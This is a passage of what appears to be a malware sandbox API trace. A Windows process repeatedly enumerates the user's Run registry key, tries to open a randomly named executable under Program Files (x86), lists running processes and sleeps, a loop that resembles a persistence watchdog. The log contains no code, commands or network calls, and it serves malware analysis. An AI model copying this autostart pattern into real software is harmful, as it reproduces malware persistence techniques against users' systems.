returned 0x0 [0254.812] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.814] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.814] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.814] NtClose (Handle=0x14c) returned 0x0 [0254.814] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.814] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.814] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.814] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.814] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.814] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.895] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.919] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.919] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.920] NtClose (Handle=0x14c) returned 0x0 [0254.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.920] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.920] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.920] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.920] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.002] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.017] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.017] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.017] NtClose (Handle=0x14c) returned 0x0 [0255.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.017] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.017] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.017] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.018] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.132] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.141] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.141] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.142] NtClose (Handle=0x14c) returned 0x0 [0255.142] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.142] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.142] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.142] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.142] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.142] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.237] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.251] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.251] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.251] NtClose (Handle=0x14c) returned 0x0 [0255.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.251] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.251] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.251] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.251] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.332] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.344] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.344] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.344] NtClose (Handle=0x14c) returned 0x0 [0255.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.345] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.345] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.345] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.345] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.460] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.469] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.469] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.469] NtClose (Handle=0x14c) returned 0x0 [0255.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.470] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.470] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.470] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.470] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.470] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.555] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.562] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.563] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.563] NtClose (Handle=0x14c) returned 0x0 [0255.563] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.563] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.563] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.563] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.563] NtCreateFile (in: FileHandle=0x19ea5c, 